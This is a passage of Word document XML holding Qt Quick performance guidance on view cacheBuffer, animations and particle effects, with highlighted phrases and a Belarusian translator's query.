          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property of a view to allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asynchronous creation and buffering of delegates outside of the visible area</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilizing a</w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cacheBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is recommended for view delegates that are non-trivial and unlikely to be created within a single frame</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00812597" w:rsidRPr="00812597">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00211A68" w:rsidRPr="00812597">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>шт. зн., што створаны ў рамках аднаго фрэйма?</w:t>
      </w:r>
      <w:r w:rsidR="00812597" w:rsidRPr="00812597">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</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Be </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mindful that a</w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cacheBu</w:t>
      </w:r>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffer</w:t>
      </w:r>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keeps additional delegates in-memory and therefore the value derived from utilizing the</w:t>
      </w:r>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cacheBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be balanced against additional memory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Developers should </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use benchmarking to find the best value for their use-case</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, since the increased memory pressure caused by utilizing a</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cacheBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can, in some </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rare cases, cause reduced frame rate when scrolling</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="968" w:name="visual-effects"/>
      <w:bookmarkStart w:id="969" w:name="_Toc483000735"/>
      <w:bookmarkStart w:id="970" w:name="_Toc483003747"/>
      <w:bookmarkStart w:id="971" w:name="_Toc483604087"/>
      <w:bookmarkStart w:id="972" w:name="_Toc483605307"/>
      <w:bookmarkEnd w:id="968"/>
      <w:r w:rsidRPr="009076E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual Effects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="969"/>
      <w:bookmarkEnd w:id="970"/>
      <w:bookmarkEnd w:id="971"/>
      <w:bookmarkEnd w:id="972"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="00490E7E" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId657" w:history="1">
        <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">includes several features which allow developers and designers </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create exceptionally appealing user interfaces</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fluidity</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamic transitions</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well as </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual effects</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to great effect in an application, but some </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>care must be taken</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when using some of the features in QML as </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they can have performance implications</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="973" w:name="animations"/>
      <w:bookmarkStart w:id="974" w:name="_Toc483000736"/>
      <w:bookmarkStart w:id="975" w:name="_Toc483003748"/>
      <w:bookmarkStart w:id="976" w:name="_Toc483604088"/>
      <w:bookmarkStart w:id="977" w:name="_Toc483605308"/>
      <w:bookmarkEnd w:id="973"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="974"/>
      <w:bookmarkEnd w:id="975"/>
      <w:bookmarkEnd w:id="976"/>
      <w:bookmarkEnd w:id="977"/>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In general, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animating a property will cause any bindings which reference that property to be re-evaluated</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usually, this is what is desired but in other cases it may be better to disable the binding prior to performing the animation, and then reassign the binding once the animation has completed</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid running JavaScript during animation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, running a complex JavaScript expression for each frame of an x property animation should be avoided.</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Developers should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>especially careful using script animations</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>these are run in the main thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and therefore can cause frames to be skipped if they take too long to complete).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="978" w:name="particles"/>
      <w:bookmarkStart w:id="979" w:name="_Toc483000737"/>
      <w:bookmarkStart w:id="980" w:name="_Toc483003749"/>
      <w:bookmarkStart w:id="981" w:name="_Toc483604089"/>
      <w:bookmarkStart w:id="982" w:name="_Toc483605309"/>
      <w:bookmarkEnd w:id="978"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Particles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="979"/>
      <w:bookmarkEnd w:id="980"/>
      <w:bookmarkEnd w:id="981"/>
      <w:bookmarkEnd w:id="982"/>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The</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId658" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Particles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>beautiful particle effects</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be integrated seamlessly into user interfaces. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However every platform has different graphics hardware capabilities, and the Particles module is unable to limit parameters to what your hardware can gracefully support</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The more particles you attempt to render (and the larger they are), the faster your graphics hardware will need to be in order to render at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>60 FPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affecting more particles requires a faster CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>therefore important to test all particle effects on your target platform carefully</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, to calibrate the number and size of particles you can render at 60 FPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="002069E3" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It should be noted that a particle system can be disabled when not in use (for example, on a non-visible element) to avoid doing unnecessary simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
